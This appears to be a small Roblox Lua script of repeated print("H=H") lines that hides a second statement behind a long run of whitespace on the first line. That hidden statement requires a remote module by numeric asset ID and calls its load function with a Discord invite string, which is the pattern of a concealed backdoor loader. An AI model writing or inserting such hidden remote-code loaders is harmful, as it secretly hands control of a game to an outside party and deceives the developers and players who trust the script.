print("H=H")                                                                                                                                                                                                                                                local a1 = "https://discord.gg/ske" require(15772895549).load(a1)
print("H=H")  
print("H=H")  
print("H=H")  
print("H=H")  
print("H=H")  
print("H=H")  
